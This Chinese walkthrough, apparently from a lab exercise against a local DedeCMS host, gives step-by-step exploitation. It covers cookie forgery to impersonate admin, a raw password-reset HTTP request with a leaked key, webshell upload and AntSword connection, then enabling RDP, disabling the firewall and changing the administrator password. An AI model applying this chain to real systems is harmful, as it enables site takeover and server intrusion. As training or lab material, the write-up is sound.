dedecms 后台界面如下
目录扫描和 robots.txt 的内容和下面差不多,没什么可利用的
后台尝试弱口令无法登录,注册个前台帐号用户名密码为 0001/111111,安全问题不要填写。
注册成功后,访问http://10.1.10.62/member/index.php?uid=0001,来到如下界面
F12 查看网页元素,复制 last_vid__ckMd5 值
last_vid__ckMd5 复制好后,登录 0001 帐号。
打开 Cookies Manager,搜索网站 ip
修改 DedeUserID__ckMd5 的值为之前复制的 last_vid__ckMd5 的内容,未修改前的值如下
修改后如下
将 DedeUserID 改为 0001,两个值改完后,可点击下 Refresh,然后关闭。
刷新,然后就变成了 admin 用户。
访问http://10.1.10.62/member/resetpassword.php,burp 发送如下包
POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
dopost=safequestion&safequestion=0.0&safeanswer=&id=1
关注响应包中的这个链接
复制下来
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM
去掉 amp;
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM
浏览器访问
直接来到了改密码的界面
密码设置为 666666。
这是前台 admin 用户的密码,接下来需要修改后台用户名的密码
访问
http://10.1.10.62/member/edit_baseinfo.php
跳到完善资料页面,直接点击完成注册即可
再一次访问http://10.1.10.62/member/edit_baseinfo.php,来到如下页面。
原密码为 666666,新密码改成 888888,填写验证码和邮箱,更新成功。
访问后台,用 admin/888888 登录,登录成功。
接下来是后台上传 shell
来到文件式管理器,新建文件
文件为 s.php,写个马
文件如下:
蚁剑 base64 编码连接
如果 3389 没开,可以上传工具包中的 vbs 脚本开启端口
关闭防火墙
修改管理员密码
远程桌面登录
